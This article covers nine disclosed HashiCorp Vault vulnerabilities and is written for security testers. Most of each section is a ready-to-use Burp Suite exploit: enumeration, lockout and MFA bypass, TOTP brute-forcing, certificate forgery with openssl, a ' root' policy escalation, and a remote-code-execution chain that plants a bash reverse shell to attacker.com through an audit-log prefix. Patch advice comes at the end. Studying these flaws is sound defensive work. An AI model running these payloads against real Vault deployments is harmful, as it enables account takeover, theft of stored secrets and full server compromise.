Cracking the Vault: A Deep Dive into Nine HashiCorp Vault Zero-Day Vulnerabilities

In a significant disclosure, security researchers from the Cyata team have unearthed nine zero-day vulnerabilities in HashiCorp Vault, a widely used tool for secret management. These vulnerabilities, some of which have been lurking in the codebase for nearly a decade, expose critical flaws in Vault's authentication, identity, and authorization mechanisms. The most severe of these, CVE-2025-6000, allows for remote code execution (RCE), marking the first publicly disclosed RCE in Vault's history.

This article provides a comprehensive overview of these vulnerabilities, their potential impact, and detailed Burp Suite-style proof-of-concept (PoC) code snippets to help security professionals understand and test for these flaws in their own environments.

The Vulnerabilities: A High-Level Overview

The nine vulnerabilities cover a wide range of attack vectors, from username enumeration and authentication bypass to privilege escalation and, ultimately, remote code execution. The following table summarizes the discovered CVEs:

CVE	HCSEC	Component	Type	CVSS	Status
CVE-2025-6010	HCSEC-2025-21	userpass	Username Enumeration	Low-Med	Disclosed, not patched
CVE-2025-6004	HCSEC-2025-16	userpass/ldap	Lockout Bypass	High	Patched
CVE-2025-6011	HCSEC-2025-15	userpass	Timing Enumeration	Low-Med	Patched
CVE-2025-6003	HCSEC-2025-20	ldap+MFA	MFA Bypass	High	Patched
CVE-2025-6013	HCSEC-2025-19	TOTP MFA	Rate Limit Bypass	High	Patched
CVE-2025-6016	HCSEC-2025-17	TOTP MFA	Code Reuse	High	Patched
CVE-2025-6037	HCSEC-2025-18	cert	Impersonation	High-Crit	Patched (8+ years old)
CVE-2025-5999	HCSEC-2025-13	Policy	Privilege Escalation	High-Crit	Patched
CVE-2025-6000	HCSEC-2025-14	Plugin/Audit	Remote Code Execution	Critical	Patched (9 years old)

Now, let's dive into the technical details and Burp Suite PoCs for each vulnerability.

1. CVE-2025-6010: Username Enumeration

Vulnerability Description

The userpass authentication method in Vault returns different error messages for valid and invalid usernames when the user lockout feature is enabled. This allows an attacker to enumerate valid usernames by intentionally triggering the lockout mechanism.

Burp Suite PoC

An attacker can use Burp Intruder to send multiple failed login attempts for a list of potential usernames. By checking the response for the string "user is locked out", it is possible to identify valid usernames.

Intruder Configuration

• Attack Type: Sniper
• Payload Position: Set the payload marker on the username in the request path.
• Payloads: Use a simple list of usernames.
• Grep - Match: Configure a match rule for the string "user is locked out".

Request Template

POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 23

{"password":"wrongpass"}

Expected Results

For each username, send ~6 requests. If the final response for a username contains "user is locked out", the username is valid.

Response for Valid User (after >5 attempts)

HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["user is locked out"]}

Response for Invalid User

HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["invalid username or password"]}

2. CVE-2025-6004: Lockout Bypass

Vulnerability Description

The user lockout mechanism in both the userpass and ldap authentication methods can be bypassed by making simple modifications to the username, such as changing the case or adding leading/trailing spaces. This allows an attacker to perform unlimited brute-force attacks against a locked-out account.

Burp Suite PoC

After a user is locked out, an attacker can use Burp Intruder to continue brute-forcing passwords by using variations of the username.

Intruder Configuration

• Attack Type: Cluster Bomb
• Payload Positions: Set payload markers on the username and password.
• Payloads:
  • Payload Set 1 (Usernames): A list of username variations (e.g., admin, Admin, ADMIN, %20admin, admin%20).
  • Payload Set 2 (Passwords): A list of passwords to test.
• Grep - Match: Configure a match rule for a successful login response (e.g., "client_token").

Request Template

POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 23

{"password":"§password§"}

Example Requests

Request with Case Variation

POST /v1/auth/userpass/login/Admin HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 27

{"password":"password123"}

Request with Leading Space

POST /v1/auth/userpass/login/%20admin HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 27

{"password":"password123"}

3. CVE-2025-6011: Timing-Based Username Enumeration

Vulnerability Description

A timing side-channel vulnerability exists in the userpass authentication method. When a valid username is provided, Vault performs a password hash comparison, which takes a small but measurable amount of additional time compared to when an invalid username is provided. This allows an attacker to enumerate valid usernames by measuring the response times.

Burp Suite PoC

This vulnerability can be exploited using Burp Intruder with a simple list of usernames. By analyzing the response times, an attacker can differentiate between valid and invalid users.

Intruder Configuration

• Attack Type: Sniper
• Payload Position: Set the payload marker on the username.
• Payloads: A list of potential usernames.
• Analysis: Sort the results by response time. Consistently longer response times indicate valid usernames.

Request Template

POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 20

{"password":"p"}

Expected Results

In the Intruder results window, add the "Response received" and "Response completed" columns. A noticeable difference in these times between requests can indicate a valid username.

4. CVE-2025-6003: MFA Bypass

Vulnerability Description

When using the LDAP authentication method with username_as_alias=true, it is possible to bypass MFA enforcement. By authenticating with a slightly modified username (e.g., with a leading space), Vault creates a new, separate entity for the user that does not have MFA enforced, even if the original entity does.

Burp Suite PoC

An attacker with valid credentials for an MFA-protected LDAP user can use Burp Repeater to bypass the MFA check.

Request 1: Normal Authentication (MFA Triggered)

POST /v1/auth/ldap/login/ldapuser HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 27

{"password":"password123"}

Response 1: MFA Required

HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"mfa_requirement":{...}}}

Request 2: MFA Bypass

POST /v1/auth/ldap/login/%20ldapuser HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 27

{"password":"password123"}

Response 2: MFA Bypassed, Token Issued

HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"client_token":"hvs.CAES...",...}}

5. CVE-2025-6013 & CVE-2025-6016: MFA Rate Limiting Bypass and Code Reuse

Vulnerability Description

These two vulnerabilities allow an attacker to bypass the rate limiting on TOTP MFA code validation and also reuse a valid TOTP code multiple times. This makes it feasible to brute-force the 6-digit TOTP code.

Burp Suite PoC

This attack can be automated with Burp Intruder and a simple script to handle the re-authentication and MFA request ID cycling.

Intruder Configuration

• Attack Type: Pitchfork
• Payload Positions: Set payload markers on the mfa_request_id and the TOTP code.
• Payloads:
  • Payload Set 1 (Request IDs): A list of MFA request IDs obtained by re-authenticating with username variations.
  • Payload Set 2 (TOTP Codes): A list of numbers from 000000 to 999999.

Request Template

POST /v1/sys/mfa/validate HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 60

{"mfa_request_id":"§request_id§","code":"§totp_code§"}

Code Reuse PoC

Once a valid TOTP code is found, it can be sent multiple times in Burp Repeater, and each request will succeed.

POST /v1/sys/mfa/validate HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 60

{"mfa_request_id":"...","code":"123456"}

6. CVE-2025-6037: Certificate Impersonation

Vulnerability Description

When using the cert authentication method with pinned certificates (non-CA mode), Vault only validates the public key of the certificate, not the Common Name (CN). This allows an attacker who has access to the private key of a pinned certificate to generate a new certificate with the same key but a different CN, effectively impersonating any user.

Burp Suite PoC

This attack requires command-line tools to generate the impersonation certificate, which is then used in a request sent through Burp Suite.

Step 1: Generate Impersonation Certificate

# Attacker has testuser.key
openssl req -new -key testuser.key -out admin_impersonation.csr -subj "/CN=admin"
openssl x509 -req -in admin_impersonation.csr -signkey testuser.key -out admin_impersonation.crt

Step 2: Configure Burp Suite

In Burp Suite, go to Project options > TLS and add a new client TLS certificate. Select the generated admin_impersonation.crt and testuser.key files.

Step 3: Send Request

Send the following request through Burp Repeater. Burp will automatically use the configured client certificate.

POST /v1/auth/cert/login HTTP/1.1
Host: vault.example.com:8200
Content-Length: 0

Response: Authenticated as Admin

HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"client_token":"...","policies":["default","admin-policy"],...}}

7. CVE-2025-5999: Privilege Escalation

Vulnerability Description

A policy normalization flaw allows an admin-level user to escalate their privileges to root. The validation layer for policy assignments checks for the exact string "root", but the enforcement layer normalizes the input by trimming whitespace and converting to lowercase. This allows an attacker to bypass the restriction and assign the root policy to their own entity.

Burp Suite PoC

An authenticated admin user can use Burp Repeater to update their own entity with a modified "root" policy.

Request 1: Attempt Direct Root Assignment (Fails)

POST /v1/identity/entity/id/<entity-id> HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <admin-token>
Content-Type: application/json
Content-Length: 20

{"policies":["root"]}

Response 1: Blocked

HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["cannot assign root policy"]}

Request 2: Bypass with Leading Space (Succeeds)

POST /v1/identity/entity/id/<entity-id> HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <admin-token>
Content-Type: application/json
Content-Length: 21

{"policies":[" root"]}

Response 2: Success

HTTP/1.1 204 No Content

8. CVE-2025-6000: Remote Code Execution

Vulnerability Description

The most critical vulnerability, CVE-2025-6000, allows a privileged Vault operator to achieve remote code execution on the underlying host. This is a devastating flaw that gives an attacker complete control over the Vault server, enabling them to exfiltrate all secrets, install persistent backdoors, and pivot to other systems in the network.

Burp Suite PoC

The RCE is achieved through a series of requests sent via Burp Repeater.

Request 1: Discover Plugin Directory

POST /v1/sys/plugins/catalog/secret/p HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 20

{"command":"p","sha256":"a"}

The response will contain an error message revealing the plugin directory (e.g., /opt/vault/plugins).

Request 2: Enable File Audit Backend with Malicious Prefix

POST /v1/sys/audit/exploit HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 150

{
  "type": "file",
  "options": {
    "file_path": "/opt/vault/plugins/rce",
    "mode": "0755",
    "prefix": "#!/bin/bash\nbash -i >& /dev/tcp/attacker.com/4444 0>&1\n#"
  }
}

Request 3: Register Malicious Plugin

After computing the SHA256 hash of the created file (e.g., by capturing it via a socket audit backend).

POST /v1/sys/plugins/catalog/secret/rce HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 80

{"command":"rce","sha256":"<computed-hash>"}

Request 4: Enable Malicious Plugin (Trigger RCE)

POST /v1/sys/mounts/exploit HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 40

{"type":"rce","plugin_name":"rce"}

This will trigger the reverse shell to the attacker's machine.

What You Should Do

HashiCorp has released patches for all the disclosed vulnerabilities. It is crucial that all Vault users upgrade to the latest patched versions as soon as possible:

• Vault 1.20.2
• Vault 1.19.8
• Vault 1.18.13
• Vault 1.16.24

In addition to upgrading, organizations should review their Vault configurations and audit logs for any signs of compromise. Restricting access to sensitive endpoints, such as /v1/sys/audit and /v1/sys/plugins, can also help mitigate the risk.

Conclusion

The discovery of these nine zero-day vulnerabilities in HashiCorp Vault is a stark reminder that even the most trusted security tools can have hidden flaws. The fact that some of these vulnerabilities have existed for nearly a decade highlights the importance of continuous security research and responsible disclosure.

By understanding the attack vectors and taking the necessary remediation steps, organizations can protect themselves from these critical vulnerabilities and ensure the continued security of their secrets.

References

• Cracking the Vault: how we found zero-day flaws in authentication, identity, and authorization in HashiCorp Vault
• HCSEC-2025-22 - Multiple Vulnerabilities Impacting HashiCorp Vault and Vault Enterprise